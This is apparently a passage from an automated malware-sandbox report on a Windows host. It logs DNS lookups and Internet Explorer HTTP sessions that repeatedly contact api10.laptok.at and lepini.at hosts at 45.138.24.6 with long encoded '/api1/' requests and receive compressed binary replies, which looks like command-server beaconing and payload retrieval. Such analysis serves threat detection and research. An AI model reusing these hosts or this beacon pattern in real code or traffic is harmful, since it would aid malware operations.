Jan 26, 2021 19:44:13.404998064 CET	192.168.2.7	8.8.8.8	0xc338	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:13.710218906 CET	192.168.2.7	8.8.8.8	0xd695	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:14.723361969 CET	192.168.2.7	8.8.8.8	0x8909	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:15.172902107 CET	192.168.2.7	8.8.8.8	0xc2bd	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:15.944129944 CET	192.168.2.7	8.8.8.8	0x997d	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:16.199652910 CET	192.168.2.7	8.8.8.8	0xec89	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:17.395212889 CET	192.168.2.7	8.8.8.8	0x449c	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:59.110050917 CET	192.168.2.7	8.8.8.8	0xa9ca	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:08.960386038 CET	192.168.2.7	8.8.8.8	0xdbb8	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:17.710565090 CET	192.168.2.7	8.8.8.8	0x3736	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:51.131093979 CET	192.168.2.7	8.8.8.8	0x1200	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.178844929 CET	192.168.2.7	8.8.8.8	0xc20a	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.179373026 CET	192.168.2.7	8.8.8.8	0xe218	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.443766117 CET	192.168.2.7	8.8.8.8	0xf2bd	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:57.560383081 CET	192.168.2.7	8.8.8.8	0xc753	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:58.541121960 CET	192.168.2.7	8.8.8.8	0x3b1c	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 26, 2021 19:44:11.448553085 CET	8.8.8.8	192.168.2.7	0x1459	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 19:44:13.479212999 CET	8.8.8.8	192.168.2.7	0xc338	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 19:44:13.777025938 CET	8.8.8.8	192.168.2.7	0xd695	No error (0)	contextual.media.net		92.122.253.103	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:14.792490005 CET	8.8.8.8	192.168.2.7	0x8909	No error (0)	lg3.media.net		92.122.253.103	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:15.238953114 CET	8.8.8.8	192.168.2.7	0xc2bd	No error (0)	hblg.media.net		92.122.253.103	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:16.005400896 CET	8.8.8.8	192.168.2.7	0x997d	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 19:44:16.247451067 CET	8.8.8.8	192.168.2.7	0xec89	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 19:44:16.247451067 CET	8.8.8.8	192.168.2.7	0xec89	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 19:44:17.457542896 CET	8.8.8.8	192.168.2.7	0x449c	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 19:44:17.457542896 CET	8.8.8.8	192.168.2.7	0x449c	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:17.457542896 CET	8.8.8.8	192.168.2.7	0x449c	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:17.457542896 CET	8.8.8.8	192.168.2.7	0x449c	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:17.457542896 CET	8.8.8.8	192.168.2.7	0x449c	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:59.476310015 CET	8.8.8.8	192.168.2.7	0xa9ca	No error (0)	api10.laptok.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:09.016892910 CET	8.8.8.8	192.168.2.7	0xdbb8	No error (0)	api10.laptok.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:18.082550049 CET	8.8.8.8	192.168.2.7	0x3736	No error (0)	api10.laptok.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:51.187516928 CET	8.8.8.8	192.168.2.7	0x1200	No error (0)	c56.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.226835012 CET	8.8.8.8	192.168.2.7	0xc20a	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.227113008 CET	8.8.8.8	192.168.2.7	0xe218	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.817686081 CET	8.8.8.8	192.168.2.7	0xf2bd	No error (0)	api3.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:57.887608051 CET	8.8.8.8	192.168.2.7	0xc753	No error (0)	api3.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:58.597937107 CET	8.8.8.8	192.168.2.7	0x3b1c	No error (0)	api3.lepini.at		45.138.24.6	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49761	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:44:59.545278072 CET	2523	OUT	GET /api1/fMoOyVtNHyb2CKT5h4Jv/cOtoUxpSs_2B7b6ktW6/8gKDvU8GZHurEn2nukEHAM/mBRpHfezDBeLc/1Val8ISr/ggV1pjQswOiZEbQ3ehKxHJY/mND7st4_2F/zvqzs_2F7uy_2Bb6o/3NqBL4_2BCgu/Eg0dWIbsiNp/OTltsytgATJROU/sIZwRhOMX71zuqhRMKIgV/JJtVE_2FgKvOcqIw/srgqU3CK_2FbRdx/IT_2FypXirSM9LJx6a/KaX7JOhW_/2F_2FH9Scf70TsmxARuA/FJ_2FEzlHBdy_2BM3Si/ebVcIeLFS9doIWImMnNuIk/8e9XWr3pdJVnY/Lc7jY8hP/_2BxFf2skUqywtS/A HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Jan 26, 2021 19:44:59.999721050 CET	2524	IN	Data Raw: 94 e3 8f 3c 17 c0 d7 4e a4 67 b3 b5 3e 16 00 ad ef da 6b d3 fd 29 e9 49 7a 11 c2 4d ad 0d 53 cd 6d d0 c7 64 20 25 c0 7e d2 3b be 00 73 5d 87 9c c8 0e 0d 1d fe 94 d8 82 81 54 37 ec a7 7a 10 08 90 e8 7c 4c 52 ca d5 52 4f 5b 3e 03 ec 0f 13 4f 1c d9 Data Ascii: <Ng>k)IzMSmd %~;s]T7z\|LRRO[>O8KYG)\|![,-2,]?[z(Q./0{PP_TKE7HsgpCYL>dIT4,EygzN4yrS6?+<rj1,#4
Jan 26, 2021 19:45:00.000107050 CET	2525	IN	Data Raw: 6a 2d a9 e6 e4 c9 70 ce ed 0b e8 b6 36 35 41 a7 49 2b 58 c3 1c 41 b5 88 58 06 80 51 a2 bd 6c fe d1 29 b3 21 ad 58 46 85 af 1f 82 53 25 c6 55 d5 ae b2 d1 23 14 35 62 86 0e c9 3a e9 7e 56 0f f3 1d 55 0c 71 a9 ec e5 d8 ad e0 07 07 cd ce 77 bd e5 10 Data Ascii: j-p65AI+XAXQl)!XFS%U#5b:~VUqwSFfJnnP5c]'m(Q'XsYnvv%_(L=u5r^~},;UOk8>~*;_<B;g0K
Jan 26, 2021 19:45:00.000530005 CET	2527	IN	Data Raw: 73 22 79 73 77 d7 48 cb 92 43 93 d5 fe 69 38 13 c2 5b 4b dd bb 93 7e 71 d0 ff a2 14 cc b3 a5 b0 31 df 28 3c 67 c9 23 c5 be 12 3e 76 81 91 73 fb ab 4b 27 3d a3 5f 2b 1c 95 9b 70 67 4f c6 92 72 bd 90 59 38 20 da 14 bd f0 35 49 7e 25 6b c0 c5 f5 f2 Data Ascii: s"yswHCi8[K~q1(<g#>vsK'=_+pgOrY8 5I~%k\x:?m?+7EjD+`<`%VpSL28)IMd4u\|A-."-'kh9a\|84Bfmz5E79w'b@I_{zQ3v
Jan 26, 2021 19:45:00.050973892 CET	2527	IN	Data Raw: 36 b8 09 5a eb ac 7e 55 62 da 7f bd 7a f7 c9 a9 31 da 83 20 2d 74 bf 49 5a 11 eb 3e 6d 1d 15 89 fb 28 06 b1 34 49 cb 3e 82 5f 50 8c ba 4f 33 41 dd bb c5 22 a8 23 7a f4 4d f5 b5 c6 45 d3 74 09 f7 ba 59 2b 27 cc d7 9f 9e b4 42 2e 25 ae ca 2b 6f d3 Data Ascii: 6Z~Ubz1 -tIZ>m(4I>_PO3A"#zMEtY+'B.%+o_x+ytTPUR[3Lk)(O? y+Yx_9}1svijuFZ6?K9e--8.W3D\|X[a5q).Q]L^@N'3O
Jan 26, 2021 19:45:00.064802885 CET	2529	IN	Data Raw: 8c af 58 e1 40 c1 11 c4 b2 f2 8b 27 04 45 0b 65 b9 5a bd 8e bb 54 de 59 e3 5f 12 56 7b e7 d2 f1 9c d2 4a 4d f3 62 eb c6 e9 33 4a 21 42 6d da ee c4 e5 e5 dc 04 b4 0c f7 8a 20 f4 dd 27 ce 7c 74 17 90 e8 b4 12 dd da 6f d7 68 2b 46 d7 a9 2c 6e ae 95 Data Ascii: X@'EeZTY_V{JMb3J!Bm '\|toh+F,np.Z<Zj^I\|S77gr+l4WYL7u%B#An[bs&E@BSor~g"=4CW@r"5N:0CO?1vw^
Jan 26, 2021 19:45:00.096421003 CET	2531	IN	Data Raw: 7e 77 a7 1b 0e d4 1b eb a3 a1 5a 65 d4 b2 ab 54 68 67 c7 e9 be b0 31 ae 6a 7e 73 3d 95 0c 83 07 76 fc 8f ee 3c 64 5a 52 4c 66 a3 a6 1c 19 54 02 39 19 05 b3 52 2b 50 b4 de 8e f5 7c c0 e5 fd 2d f3 59 05 1b 4e bb 22 36 88 a3 d4 12 59 fb eb 40 fd 73 Data Ascii: ~wZeThg1j~s=v<dZRLfT9R+P\|-YN"6Y@s !'E0)Vmh>=uy<\4HX@{<J]lU~7=KpPwhJQ\|n68?zmBXxFu}W_ku6=ow
Jan 26, 2021 19:45:00.101540089 CET	2532	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:44:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9a c5 72 eb 40 14 05 3f c8 0b 31 2d 25 59 cc 0c 3b 31 33 eb eb 9f f3 96 49 55 54 d6 cc bd e7 74 bb 92 e2 f1 64 55 d2 24 2c 72 76 a2 1b 4c d1 ce b8 72 2a 7c d7 35 c3 f7 0a 3f b5 58 11 ea 49 2a a5 52 7d 1e 0c 5d 9b 7d 4d 22 47 7a 4d 4d 60 27 d9 ce e3 20 22 85 dd de a1 9b eb fb 63 2b 37 4e 83 f6 dd cc eb 42 1e 65 f1 cb be 52 4e 6c 73 20 dd b3 3e b4 00 1a 1f b0 d2 35 29 9f f3 24 75 9a 42 c2 39 33 05 67 64 0b ed 47 96 92 eb 97 1e 6e b7 13 b1 dd 52 67 67 62 58 ad 98 b4 c5 a0 07 6b 53 d9 67 9c 29 87 dd 85 a2 38 4e 76 cb ec 9e 8c c0 a8 45 99 d6 06 24 c7 44 6a 13 6e 27 b1 de bc a4 11 ce 21 56 31 5f 8f 9f 6f bd c5 d1 f2 6a 10 d0 cf ca aa 5a 4b c3 65 f2 98 c9 c2 9a 34 47 25 64 f4 3a 6a df e0 5a d4 ac 82 31 bc 39 74 c2 3e bd d6 0f 7b 7b 62 bf 60 01 35 c9 98 1d 9d 8d 65 2e d0 b5 87 34 41 65 48 ac ce 2e ed 5d a4 8c c6 3d 56 6f 5d ed 79 3c ca 1e af dd 9b 10 03 03 bc a6 95 50 1c a1 8b 14 21 62 96 fa d4 3b 1d 31 bf c1 55 74 0c d9 a5 fc 69 33 ca 74 07 95 53 02 c7 06 0a 70 f6 bc 0e 3a cb 79 95 b6 77 73 89 7d b1 30 06 29 d6 df 0a 71 86 c6 b6 2c 38 74 04 d2 88 68 a6 8a 68 3c 5f 29 41 0a f7 51 11 e8 4e 36 4d 3e 39 63 8d ff f8 4c 0d a8 bc 56 58 80 e2 7c 78 7d 78 36 dd 66 04 1d 10 da a8 81 79 49 98 5e 0c f6 b2 ee e3 e7 98 01 7d 21 0b df a8 ef ce 69 1e eb be 74 e4 2b 8d fb 21 40 7a c1 78 f0 c1 5f 14 39 2a d7 be 6e 86 6b da 88 c5 22 79 cd ca 80 6f b8 d6 00 1a 41 ab 21 69 b3 ce 41 5b e1 26 05 a1 8f 7e 34 0f 01 a6 0a be 67 7c 85 cc 9b 85 ae 9a 57 f9 38 4b 21 cc 06 df 6c 05 6c 6c 01 23 7a 4e 65 9c 61 3b b8 83 20 44 9d ed 0b e1 98 6f 8a 5e f6 88 7c 0c 7d 20 c7 71 3d 09 93 a3 c8 e0 51 81 99 43 0c de 46 f0 23 fa 4d 06 a0 23 84 14 75 75 43 5d 5a ed ca 98 f0 25 14 ed 12 fc 2a 14 14 80 a2 49 45 2e f9 0b e2 4f 4e 6a f6 0f a7 f0 99 26 1f 55 0e 39 05 6d 0d 27 58 28 7b 57 21 4d 1b 8b e0 19 79 22 52 1f 91 1c 58 4d 5e 3e ce 02 c1 dc ed 98 1d 9c 39 f1 12 5f 89 68 6f 39 5c 1c 31 83 6b e5 16 cc dd 17 68 2e 17 88 2e 61 10 9e ef 23 48 af 65 7c 38 d6 c7 13 16 43 1b d4 0e a6 ef 71 e8 4a 12 14 a1 b6 d5 02 28 8b dc a8 d5 62 87 4b e7 0d c7 d8 48 13 a1 6f 76 25 a4 41 f4 cb 7c cd 3d ca f8 50 a8 f0 95 a8 3c ac cb 3e f5 dc 1a da ab a6 d2 17 11 98 c2 78 0a b0 2e ac ab 98 fd 35 91 cb 38 cc b2 43 70 12 61 53 14 ac f0 d3 da 7e 0b 7c 77 fd 11 46 96 d9 42 df ad 1b 66 31 50 73 c4 1f eb 2a d8 d5 8a e3 c4 10 7b 65 26 ab a2 a7 71 1f 76 1d 24 5f ec 56 a6 68 a9 04 4d 2e a0 fe 2a 31 09 f0 2b 49 3d 90 23 0c c6 6f 98 3a 02 a8 38 e3 dc c9 ae 4d 86 f5 ac 6e 4f 6e bf c0 f7 35 0b 89 81 68 4d ff 6a dc d2 37 a0 cd b2 4b 1d bf 29 92 d2 10 f9 65 17 b2 b2 9e 8d 28 d0 2b 60 ef 01 cc df 04 cb 8b 06 d1 6b bc aa 6f 5c b2 b3 aa 76 13 3d 3f 99 fd 4d e1 1d fb 1d 5b 5e 47 41 63 a1 db 18 f0 8a 24 68 00 ca 1e a2 67 19 d5 0d b1 6d f7 6c fc 7d 98 d4 e2 5f b9 81 a8 80 00 b5 97 16 94 13 44 23 e9 79 cc d9 fb e4 57 9d 13 de dc c1 5f 09 e8 ac af 52 2d ea 53 3e 60 b0 1e ef 43 4f 4c 92 d7 a7 0a 2c d3 5b 73 26 e3 a9 8d 8b 9e 97 97 93 aa 03 83 ee 19 84 8d 41 b5 37 72 8a b5 6f 9d 07 29 18 8c 24 3a 8e 6e 9c b0 c0 85 1f 7b be 02 45 69 ea 52 3d aa f4 63 17 7b 64 19 c3 0e 59 69 00 e3 2f f2 c2 4d e6 bf 5e Data Ascii: 2000r@?1-%Y;13IUTtdU$,rvLr\|5?XIR}]}M"GzMM`' "c+7NBeRNls >5)$uB93gdGnRggbXkSg)8NvE$Djn'!V1_ojZKe4G%d:jZ19t>{{b`5e.4AeH.]=Vo]y<P!b;1Uti3tSp:yws}0)q,8thh<_)AQN6M>9cLVX\|x}x6fyI^}!it+!@zx_9nk"yoA!iA[&~4g\|W8K!lll#zNea; Do^\|} q=QCF#M#uuC]Z%IE.ONj&U9m'X({W!My"RXM^>9_ho9\1kh..a#He\|8CqJ(bKHov%A\|=P<>x.58CpaS~\|wFBf1Ps{e&qv$_VhM.1+I=#o:8MnOn5hMj7K)e(+`ko\v=?M[^GAc$hgml}_D#yW_R-S>`COL,[s&A7ro)$:n{EiR=c{dYi/M^
Jan 26, 2021 19:45:00.147532940 CET	2534	IN	Data Raw: 0a 3c 5f 0a 85 0f bb c8 bd a0 7f 65 0a 9b bb 88 51 1e a5 42 68 8e d0 11 89 b9 68 c7 2c 80 59 ce 70 8f 11 8c 10 49 56 a7 e7 9f 70 ec 74 9b c7 0b e5 2c 33 b8 f1 6a 79 2e e7 b7 f7 9d a0 ad 74 09 d2 35 e6 09 0d 51 3b 8c 98 89 f8 4a 67 3e 70 78 75 8b Data Ascii: <_eQBhh,YpIVpt,3jy.t5Q;Jg>pxu\|\QejCI{O70xJXw5S<Ng>k)IzMSmd %~;s]T7z\|LRRO[>O8KYG)\|![,-2,]?[z
Jan 26, 2021 19:45:00.152467012 CET	2535	IN	Data Raw: 6a 2d a9 e6 e4 c9 70 ce ed 0b e8 b6 36 35 41 a7 49 2b 58 c3 1c 41 b5 88 58 06 80 51 a2 bd 6c fe d1 29 b3 21 ad 58 46 85 af 1f 82 53 25 c6 55 d5 ae b2 d1 23 14 35 62 86 0e c9 3a e9 7e 56 0f f3 1d 55 0c 71 a9 ec e5 d8 ad e0 07 07 cd ce 77 bd e5 10 Data Ascii: j-p65AI+XAXQl)!XFS%U#5b:~VUqwSFfJnnP5c]'m(Q'XsYnvv%_(L=u5r^~},;UOk8>~*;_<B;g0K
Jan 26, 2021 19:45:00.197186947 CET	2559	IN	Data Raw: 73 22 79 73 77 d7 48 cb 92 43 93 d5 fe 69 38 13 c2 5b 4b dd bb 93 7e 71 d0 ff a2 14 cc b3 a5 b0 31 df 28 3c 67 c9 23 c5 be 12 3e 76 81 91 73 fb ab 4b 27 3d a3 5f 2b 1c 95 9b 70 67 4f c6 92 72 bd 90 59 38 20 da 14 bd f0 35 49 7e 25 6b c0 c5 f5 f2 Data Ascii: s"yswHCi8[K~q1(<g#>vsK'=_+pgOrY8 5I~%k\x:?m?+7EjD+`<`%VpSL28)IMd4u\|A-."-'kh9a\|84Bfmz5E79w'b@I_{zQ3v
Jan 26, 2021 19:45:00.197565079 CET	2560	IN	Data Raw: 34 30 30 30 0d 0a c4 17 48 61 ba ae 5b fe 68 3f cd fb 7a f8 61 a4 d5 8d 18 09 f8 b1 dd 59 cb b3 0f cd c0 47 db 98 25 be dc 90 86 e0 28 f6 23 54 f8 8d a7 4c 4f 7d fa b3 7e fd 0f 0b e2 05 58 ec e6 ca 31 da 8f e6 04 62 c3 d0 e8 43 51 69 18 0b a0 08 Data Ascii: 4000Ha[h?zaYG%(#TLO}~X1bCQi+l~6S!_\|p'^[o^Wyl5<*>$0_Z>y!,'GeTQV#\hU>VE^XcQP\P{q\,SJ\C}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49762	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:05.002677917 CET	5941	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Jan 26, 2021 19:45:05.117295980 CET	5942	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 26 Jan 2021 18:45:05 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49770	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:09.107569933 CET	6033	OUT	GET /api1/zu_2FE7OgtG1YElZCJHzk/3Z6oZ2v_2FSvhdpl/3dtqOsJj6Y7KZxP/RohYJ_2FHTGS4WhMsK/QG5B0lq_2/BpfIpB91VJE6CEmZQm7M/PQN4vdDkebJ_2BGxKNI/VsKdR_2FzTa6vjFIkSkAZy/r8dnnf58olJ6u/p6WgAtg_/2FXj_2Baw19poatwg_2F2kO/3f5_2FyJS3/nBZ6Nmhf_2FEUX1qE/XHrQlN8gAX37/PR_2Fy_2B_2/BhmNEXvGPQ5mPx/Z35_2F9v0RKzbUs6X6gjG/o6gCLElU7pE_2Bpx/oRgBOdZRxgLD0_2/BNQ4L9i8wZtjCkBFgV/vbRDZhUKm/0qlCcD5z2Gyxth4kqVNJ/dA0aOC4 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Jan 26, 2021 19:45:09.533607960 CET	6919	IN	Data Raw: fb 65 17 8f d6 02 44 9a e0 b5 45 3f 68 4d 65 00 d7 ca 3d 86 4d e0 b7 9a 6c 7b 73 9d 65 b7 e4 8f d2 62 af 53 a5 64 6d 75 6d 19 76 24 6c d1 87 1d dc f7 a1 f9 31 ff 12 40 1e 34 81 82 45 51 42 8f d3 98 42 c4 a4 c9 df 1d a4 52 63 00 5c 26 a8 45 08 6f Data Ascii: eDE?hMe=Ml{sebSdmumv$l1@4EQBBRc\&Eo%^W4(X}J#w}E7UazQ,M^cLIJI$(Wn0YQm0QQ:nuHf@ 7@3;E6C
Jan 26, 2021 19:45:09.534074068 CET	6920	IN	Data Raw: 86 e9 e3 8f 41 60 3a b4 73 35 fc 1b c5 db 95 2d 9b 76 81 9f c9 f8 71 59 4c 37 8c a6 6f fc 1c ca 7c 28 a6 79 c2 b1 fe 84 53 2a 1f c4 b9 a8 1e 61 17 de 22 d8 45 06 e7 f6 b0 ad d3 3c 8f f3 23 f5 9e 02 40 33 3f 84 7d 00 02 9e 7a bd 05 b9 b2 7a 3e 81 Data Ascii: A`:s5-vqYL7o\|(ySa"E<#@3?}zz>>eQZc"/_>W/%'2]2Qo+TK\71h,K'Dl!\Cvt#ZVD@%`lkZ^ElnQQ;fvTK~T
Jan 26, 2021 19:45:09.534501076 CET	6921	IN	Data Raw: fd fe 76 87 3b 9b d0 df 5f 83 d1 57 2d 57 7d cc 83 50 b5 3f b4 64 4f 45 e7 de c2 7d 76 0e 36 16 d5 d5 db 5f 9d ea 75 d6 88 5a bb a8 d5 fd 33 eb 25 ba de f1 4d ef 2d d3 6e 8b 67 5e e0 95 a3 23 3c 3c cd de 6a ef 68 51 78 12 2b 98 83 c7 73 4b a0 ee Data Ascii: v;_W-W}P?dOE}v6_uZ3%M-ng^#<<jhQx+sKhzis,R8!omGeS\HFO]%qnKD;6\|dz^W0.73ZZIJ"?KkgG?4&lJ5n~
Jan 26, 2021 19:45:09.574595928 CET	6961	IN	Data Raw: 36 52 22 05 63 51 f2 b8 ad 6a 21 0f a4 71 a3 ef 0e f3 0f 33 eb 21 ad 6b 7a 38 c1 ba 78 59 d2 2f f2 5e 90 e0 b4 f9 e5 8e 1f ff 6a 9b 55 2a ef 07 4a 68 7e 84 58 be f2 83 66 f3 96 c5 c6 be fb 17 79 b3 f3 89 4e 1e 44 88 d5 a3 a7 7f 7a 7f d5 21 ca d9 Data Ascii: 6R"cQj!q3!kz8xY/^jU*Jh~XfyNDz!C,6D9[FPM3d(3&a+;f$52lB`QQ&>9iHGIY@1U;J{S-yi% =0qmrTC5^^gNnNz3
Jan 26, 2021 19:45:09.574986935 CET	6963	IN	Data Raw: 86 58 a9 3b 8a dc 5c 9c 8c ef bf e8 3b be 2b a5 22 3f d6 d4 0f d7 60 66 47 08 a9 db c7 06 aa 89 a2 c9 78 04 b3 2e 6a 5e dc 06 48 b7 b9 d6 3e cd 24 5e e0 a8 2e 53 ac f3 2a 92 a2 e3 d6 53 53 41 93 d2 13 f2 29 05 1f c3 ff 71 19 f1 69 5b c0 e6 a7 67 Data Ascii: X;\;+"?`fGx.j^H>$^.SSSA)qi[gyKfYLIP!f3(CJ0Opi"(bFMDWihr8#}EK6Y>CbJ=?IU,\|zNks`o=B?uRL;a6hW-,
Jan 26, 2021 19:45:09.683124065 CET	6981	IN	Data Raw: e0 f1 17 97 b6 42 a2 cf df 93 6d d0 0f 34 8b 6f bc e0 0b 2e 9b ce 0e a1 a0 20 ca 4a 74 5d c4 bc a9 d6 ae e2 3f ae f4 04 e2 d0 69 16 54 23 92 47 0c 65 1b 99 44 32 19 ba 43 5f 6c 0c cb 4d 57 10 b4 de 61 ec e7 77 5f bb 9f 5c d6 bd 1e 84 98 83 04 dd Data Ascii: Bm4o. Jt]?iT#GeD2C_lMWaw_\r;tfVsj0`tal!8Av+D}Z[p:cG3@'0\|8;\mqK&S+24*<Iw#R8'dARvg&$/m1,m6/.Gw/&
Jan 26, 2021 19:45:09.734744072 CET	6986	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 ae a4 00 14 05 3f 88 05 6e 4b dc 9d c6 76 b8 bb f3 f5 f3 86 f4 b2 13 e4 ca a9 4a 40 5d 9b 1b 51 d2 4b a6 ea a4 6f 96 5c dc 6e d8 d2 55 36 fd a1 6a f7 e9 45 cb c0 ae c4 2b 6e cc d7 3f 88 8c b9 ce 3e 53 16 cc 1e 7f 63 f7 2e 6a 50 cf f5 d7 32 2c 77 68 d8 e3 12 78 4a 9f 4b e6 f2 ae 1c 4f f1 0b 65 92 4e ce 7b 39 80 35 a8 f6 13 61 7a 6a 97 8d bd f9 f1 58 69 7e 59 31 f4 5e 2d 7c f4 f1 db 0b ab 24 a8 1b 1a bc ac ee 38 fb 92 44 44 34 42 5e ca 36 85 bd 99 7e 89 37 05 72 f4 0c 6c 98 7b 36 4e d7 1e 23 58 ad d6 c1 a5 62 a7 76 21 8e b4 df 7c 6e 38 d8 90 89 c6 c0 24 7a 9b ba 64 ec 4e bb d5 4d 9f 25 5b 59 3e 9b ec 30 ae 24 71 04 b8 5b 61 8a cc 3a 34 f0 83 dd 6e 4a 76 c3 9c e6 75 24 73 24 f9 28 16 e2 6b c0 5c c5 5a 4a cf 30 a4 03 63 f8 3d f9 51 53 9b 35 40 da 3d 26 fd f5 75 85 02 a0 e5 09 40 5d bd 56 87 45 74 81 bd b3 33 7f 3f d2 af bb 0f 74 ae 56 bc 2c 4b 30 02 56 0c d6 6e 99 4e ab 90 3b a0 11 e2 da 62 8e 2f 45 52 c4 da 90 aa 26 9e 5a d7 33 6b 4f ad 68 24 4f 70 5c d3 56 18 af 2c 92 2b ce c5 60 61 a5 6c a3 fc 57 da 28 7d 0d e4 35 c0 29 76 39 46 09 d6 bc 53 24 73 92 b7 74 93 f1 61 bb 30 a7 a4 89 cf 83 6e f1 c3 94 0b d5 ac c1 10 00 da 8f ad 26 34 0a 35 b7 8a f2 1d b4 a1 3a 09 75 d1 99 55 3a 6d 40 df 60 65 eb 0d 22 12 02 7b f9 42 e9 96 69 a5 1a 43 ce 42 8e c8 a3 dc 